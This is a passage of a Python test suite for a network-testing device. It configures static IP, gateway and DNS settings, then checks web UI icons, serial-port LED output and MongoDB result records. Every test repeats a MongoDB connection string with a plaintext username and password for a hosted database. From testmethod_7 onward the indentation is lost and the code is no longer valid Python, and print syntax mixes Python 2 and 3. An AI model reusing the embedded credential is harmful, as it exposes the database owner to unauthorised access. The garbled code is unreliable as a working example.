    known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
    assert ipConfig_value == known_ipConfig_value
    assert GW_value == known_GW_value
    assert cloud_value == known_cloud_value
    ser = serial.Serial()
    ser.baudrate = 115200
    ser.port = '/dev/ttyUSB0'
    ser.open()
    assert ser.isOpen()
    ser.write('leds\n')
    ser.inWaiting()
    b = ser.read(110)
    str1 = bytes.decode(b)
    print(str1)
    dhcp_led = 'DHCP:\tGREEN'
    GW_led = 'GW:\tNONE'
    #www_led = 'WWW:\tRED'
    assert str1.find(dhcp_led) != -1
    assert str1.find(GW_led) != -1
    dhcp_test = UITest()
    dhcp_test.dhcp_config_retest()
    time.sleep(5)
    cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
    print(cloudHeadIcon_value)
    browser.quit()
    assert cloudHeadIcon_value == False
    MONGOHQ_URL = 'mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
    DATABASE = 'linksprinter-new-test'
    mongoClient = MongoClient(MONGOHQ_URL)
    linksprinter = mongoClient[DATABASE]
    collection = linksprinter.results
    print(collection)
    a = collection.find({"unit_mac": "00C017-090909", "cached": True}).sort([("created_at", pymongo.DESCENDING)]).limit(1)
    aa = dict(a[0])
    dhcp_color = aa['ipConfigColor']
    www_color = aa['wwwColor']
    print('The ipConfigColor is %s' % dhcp_color)
    print('The wwwColor is %s' % www_color)
    assert dhcp_color == u'green'
    assert www_color == u'red'

def testmethod_2():
    print "Method testmethod_2 in class testclass_4"
    print "Method GW empty, DNS empty, WWW IP, same subnet, reachable in class testclass_4"
    __author__ = 'bzhang4'
    scheme = Scheme.find('wlan0', '1234')
    time.sleep(5)
    scheme.activate()
    ui_operation = UITest()
    ui_operation.static_config('192.168.2.33', '255.255.255.0', '0.0.0.0', '0.0.0.0')
    time.sleep(5)
    ui_operation.ping_config_retest('192.168.2.200')
    browser = webdriver.Firefox()
    browser.get('http://172.16.9.9')
    time.sleep(3)
    ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
    GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
    cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
    print(cloud_value)
    known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
    known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
    known_cloud_value = 'http://172.16.9.9/images/cloudgreen.png'
    assert ipConfig_value == known_ipConfig_value
    assert GW_value == known_GW_value
    assert cloud_value == known_cloud_value
    ser = serial.Serial()
    ser.baudrate = 115200
    ser.port = '/dev/ttyUSB0'
    ser.open()
    assert ser.isOpen()
    ser.write('leds\n')
    ser.inWaiting()
    b = ser.read(110)
    str1 = bytes.decode(b)
    print(str1)
    dhcp_led = 'DHCP:\tGREEN'
    GW_led = 'GW:\tNONE'
    #www_led = 'WWW:\tRED'
    assert str1.find(dhcp_led) != -1
    assert str1.find(GW_led) != -1
    dhcp_test = UITest()
    dhcp_test.dhcp_config_retest()
    time.sleep(5)
    cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
    print(cloudHeadIcon_value)
    browser.quit()
    assert cloudHeadIcon_value == False
    MONGOHQ_URL = 'mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
    DATABASE = 'linksprinter-new-test'
    mongoClient = MongoClient(MONGOHQ_URL)
    linksprinter = mongoClient[DATABASE]
    collection = linksprinter.results
    print(collection)
    a = collection.find({"unit_mac": "00C017-090909", "cached": True}).sort([("created_at", pymongo.DESCENDING)]).limit(1)
    aa = dict(a[0])
    dhcp_color = aa['ipConfigColor']
    www_color = aa['wwwColor']
    print('The ipConfigColor is %s' % dhcp_color)
    print('The wwwColor is %s' % www_color)
    assert dhcp_color == u'green'
    assert www_color == u'green'

def testmethod_3():
    print "Method testmethod_3 in class testclass_4"
    print "GW empty, DNS empty, WWW IP, same subnet, fw enable in class testclass_4"
    __author__ = 'bzhang4'
    scheme = Scheme.find('wlan0', '1234')
    time.sleep(5)
    scheme.activate()
    firewall = Gateway()
    firewall.set_firewall_enable()
    ui_operation = UITest()
    ui_operation.static_config('192.168.2.33', '255.255.255.0', '0.0.0.0', '0.0.0.0')
    time.sleep(5)
    ui_operation.ping_config_retest('192.168.2.200')
    browser = webdriver.Firefox()
    browser.get('http://172.16.9.9')
    time.sleep(3)
    ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
    GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
    cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
    print(cloud_value)
    known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
    known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
    known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
    assert ipConfig_value == known_ipConfig_value
    assert GW_value == known_GW_value
    assert cloud_value == known_cloud_value
    ser = serial.Serial()
    ser.baudrate = 115200
    ser.port = '/dev/ttyUSB0'
    ser.open()
    assert ser.isOpen()
    ser.write('leds\n')
    ser.inWaiting()
    b = ser.read(110)
    str1 = bytes.decode(b)
    print(str1)
    dhcp_led = 'DHCP:\tGREEN'
    GW_led = 'GW:\tNONE'
    #www_led = 'WWW:\tRED'
    assert str1.find(dhcp_led) != -1
    assert str1.find(GW_led) != -1
    firewall1 = Gateway()
    firewall1.set_firewall_disable()
    dhcp_test = UITest()
    dhcp_test.dhcp_config_retest()
    time.sleep(5)
    cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
    print(cloudHeadIcon_value)
    browser.quit()
    assert cloudHeadIcon_value == False
    MONGOHQ_URL = 'mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
    DATABASE = 'linksprinter-new-test'
    mongoClient = MongoClient(MONGOHQ_URL)
    linksprinter = mongoClient[DATABASE]
    collection = linksprinter.results
    print(collection)
    a = collection.find({"unit_mac": "00C017-090909", "cached": True}).sort([("created_at", pymongo.DESCENDING)]).limit(1)
    aa = dict(a[0])
    dhcp_color = aa['ipConfigColor']
    www_color = aa['wwwColor']
    print('The ipConfigColor is %s' % dhcp_color)
    print('The wwwColor is %s' % www_color)
    assert dhcp_color == u'green'
    assert www_color == u'red'

def testmethod_4():
    print "Method testmethod_4 in class testclass_4"
    print "Method GW empty, DNS empty, WWW IP, same subnet, arp failed in class testclass_4"
    __author__ = 'bzhang4'
    scheme = Scheme.find('wlan0', '1234')
    time.sleep(5)
    scheme.activate()
    ui_operation = UITest()
    ui_operation.static_config('192.168.2.33', '255.255.255.0', '0.0.0.0', '0.0.0.0')
    time.sleep(5)
    ui_operation.ping_config_retest('192.168.2.2')
    browser = webdriver.Firefox()
    browser.get('http://172.16.9.9')
    time.sleep(3)
    ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
    GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
    cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
    print(cloud_value)
    known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
    known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
    known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
    assert ipConfig_value == known_ipConfig_value
    assert GW_value == known_GW_value
    assert cloud_value == known_cloud_value
    ser = serial.Serial()
    ser.baudrate = 115200
    ser.port = '/dev/ttyUSB0'
    ser.open()
    assert ser.isOpen()
    ser.write('leds\n')
    ser.inWaiting()
    b = ser.read(110)
    str1 = bytes.decode(b)
    print(str1)
    dhcp_led = 'DHCP:\tGREEN'
    GW_led = 'GW:\tNONE'
    #www_led = 'WWW:\tRED'
    assert str1.find(dhcp_led) != -1
    assert str1.find(GW_led) != -1
    dhcp_test = UITest()
    dhcp_test.dhcp_config_retest()
    time.sleep(5)
    cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
    print(cloudHeadIcon_value)
    browser.quit()
    assert cloudHeadIcon_value == False
    MONGOHQ_URL = 'mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
    DATABASE = 'linksprinter-new-test'
    mongoClient = MongoClient(MONGOHQ_URL)
    linksprinter = mongoClient[DATABASE]
    collection = linksprinter.results
    print(collection)
    a = collection.find({"unit_mac": "00C017-090909", "cached": True}).sort([("created_at", pymongo.DESCENDING)]).limit(1)
    aa = dict(a[0])
    dhcp_color = aa['ipConfigColor']
    www_color = aa['wwwColor']
    print('The ipConfigColor is %s' % dhcp_color)
    print('The wwwColor is %s' % www_color)
    assert dhcp_color == u'green'
    assert www_color == u'red'

def testmethod_5():
    print "Method testmethod_5 in class testclass_4"
    print "Method GW empty, DNS empty, WWW IP, different subnet in class testclass_4"
    __author__ = 'bzhang4'
    scheme = Scheme.find('wlan0', '1234')
    time.sleep(5)
    scheme.activate()
    ui_operation = UITest()
    ui_operation.static_config('192.168.2.33', '255.255.255.0', '0.0.0.0', '0.0.0.0')
    time.sleep(5)
    ui_operation.ping_config_retest('192.168.1.200')
    browser = webdriver.Firefox()
    browser.get('http://172.16.9.9')
    time.sleep(3)
    ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
    GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
    cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
    print(cloud_value)
    known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
    known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
    known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
    assert ipConfig_value == known_ipConfig_value
    assert GW_value == known_GW_value
    assert cloud_value == known_cloud_value
    ser = serial.Serial()
    ser.baudrate = 115200
    ser.port = '/dev/ttyUSB0'
    ser.open()
    assert ser.isOpen()
    ser.write('leds\n')
    ser.inWaiting()
    b = ser.read(110)
    str1 = bytes.decode(b)
    print(str1)
    dhcp_led = 'DHCP:\tGREEN'
    GW_led = 'GW:\tNONE'
    #www_led = 'WWW:\tRED'
    assert str1.find(dhcp_led) != -1
    assert str1.find(GW_led) != -1
    dhcp_test = UITest()
    dhcp_test.dhcp_config_retest()
    time.sleep(5)
    cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
    print(cloudHeadIcon_value)
    browser.quit()
    assert cloudHeadIcon_value == False
    MONGOHQ_URL = 'mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
    DATABASE = 'linksprinter-new-test'
    mongoClient = MongoClient(MONGOHQ_URL)
    linksprinter = mongoClient[DATABASE]
    collection = linksprinter.results
    print(collection)
    a = collection.find({"unit_mac": "00C017-090909", "cached": True}).sort([("created_at", pymongo.DESCENDING)]).limit(1)
    aa = dict(a[0])
    dhcp_color = aa['ipConfigColor']
    www_color = aa['wwwColor']
    print('The ipConfigColor is %s' % dhcp_color)
    print('The wwwColor is %s' % www_color)
    assert dhcp_color == u'green'
    assert www_color == u'red'

def testmethod_6():
    print "Method testmethod_6 in class testclass_4"
    print "Method GW empty, DNS same subnet set, WWW hostname, same subnet, reachable in class testclass_4"
    __author__ = 'bzhang4'
    scheme = Scheme.find('wlan0', '1234')
    time.sleep(5)
    scheme.activate()
    ui_operation = UITest()
    ui_operation.static_config('192.168.2.33', '255.255.255.0', '0.0.0.0', '192.168.2.100')
    time.sleep(5)
    ui_operation.ping_config_retest('a.fnet.com')
    browser = webdriver.Firefox()
    browser.get('http://172.16.9.9')
    time.sleep(3)
    ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
    GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
    cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
    print(cloud_value)
    known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
    known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
    known_cloud_value = 'http://172.16.9.9/images/cloudgreen.png'
    assert ipConfig_value == known_ipConfig_value
    assert GW_value == known_GW_value
    assert cloud_value == known_cloud_value
    ser = serial.Serial()
    ser.baudrate = 115200
    ser.port = '/dev/ttyUSB0'
    ser.open()
    assert ser.isOpen()
    ser.write('leds\n')
    ser.inWaiting()
    b = ser.read(110)
    str1 = bytes.decode(b)
    print(str1)
    dhcp_led = 'DHCP:\tGREEN'
    GW_led = 'GW:\tNONE'
    #www_led = 'WWW:\tRED'
    assert str1.find(dhcp_led) != -1
    assert str1.find(GW_led) != -1
    dhcp_test = UITest()
    dhcp_test.dhcp_config_retest()
    time.sleep(5)
    cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
    print(cloudHeadIcon_value)
    browser.quit()
    assert cloudHeadIcon_value == False
    MONGOHQ_URL = 'mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
    DATABASE = 'linksprinter-new-test'
    mongoClient = MongoClient(MONGOHQ_URL)
    linksprinter = mongoClient[DATABASE]
    collection = linksprinter.results
    print(collection)
    a = collection.find({"unit_mac": "00C017-090909", "cached": True}).sort([("created_at", pymongo.DESCENDING)]).limit(1)
    aa = dict(a[0])
    dhcp_color = aa['ipConfigColor']
    www_color = aa['wwwColor']
    print('The ipConfigColor is %s' % dhcp_color)
    print('The wwwColor is %s' % www_color)
    assert dhcp_color == u'green'
    assert www_color == u'green'
def testmethod_7():
print "Method testmethod_7 in class testclass_4"
print "Method GW empty, DNS same subnet set, WWW hostname, same subnet, fw enable in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
firewall = Gateway()
firewall.set_firewall_enable()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
firewall1 = Gateway()
firewall1.set_firewall_disable()
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
assert not cloudHeadIcon_value
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_8():
print("Method testmethod_8 in class testclass_4")
print("Method GW empty, DNS same subnet set, WWW hostname, same subnet, arp failed in class testclass_4")
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('c.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
assert not cloudHeadIcon_value
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_9():
print("Method testmethod_9 in class testclass_4")
print("Method GW empty, DNS same subnet set, WWW hostname, different subnet in class testclass_4")
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('192.168.1.200')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
assert not cloudHeadIcon_value
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_10():
print("Method testmethod_10 in class testclass_4")
print("Method GW empty, DNS same subnet, DNS service down, WWW hostname in class testclass_4")
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
down_dns = DNS()
down_dns.set_dns_stop()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
up_dns = DNS()
up_dns.set_dns_start()
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
assert not cloudHeadIcon_value
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_11():
print("Method testmethod_11 in class testclass_4")
print("Method GW empty, DNS different subnet, WWW hostname in class testclass_4")
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','192.168.1.100')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
assert not cloudHeadIcon_value
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_12():
print("Method testmethod_12 in class testclass_4")
print("Method GW set, DNS empty, WWW hostname in class testclass_4")
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','192.168.2.200','0.0.0.0')
time.sleep(5)
ui_operation.ping_config_retest('a.fnet.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewaygreen.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tGREEN'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
assert not cloudHeadIcon_value
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
GW_color = aa['routerColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
assert GW_color == u'green'
def testmethod_13():
print("Method testmethod_13 in class testclass_4")
print("Method GW set incorrect, WWW different subnet in class testclass_4")
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','192.168.2.210','192.168.2.100')
time.sleep(5)
ui_operation.ping_config_retest('www.baidu.com')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayred.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tRED'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
assert not cloudHeadIcon_value
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
GW_color = aa['routerColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
assert GW_color == u'red'
